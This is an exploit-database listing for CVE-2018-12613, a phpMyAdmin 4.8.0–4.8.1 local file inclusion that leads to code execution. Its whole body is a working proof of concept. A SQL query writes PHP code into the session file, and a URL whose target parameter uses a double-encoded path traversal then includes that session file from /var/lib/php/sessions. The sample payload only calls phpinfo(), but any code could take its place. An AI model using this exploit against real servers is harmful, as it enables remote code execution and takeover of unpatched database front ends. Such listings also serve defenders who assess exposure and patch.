Lucene search

K
zdtVulnSpy1337DAY-ID-30622
HistoryJun 22, 2018 - 12:00 a.m.

phpMyAdmin 4.8.1 Code Execution / Local File Inclusion Vulnerabilities

2018-06-2200:00:00
VulnSpy
0day.today
151

0.974 High

EPSS

Percentile

99.9%

Exploit for php platform in category web applications

# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.0, 4.8.1
# Tested on: php7 mysql5
# CVE : CVE-2018-12613
 
1. Run SQL Query : select '<?php phpinfo();exit;?>'
2. Include the session file :
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

#  0day.today [2018-06-23]  #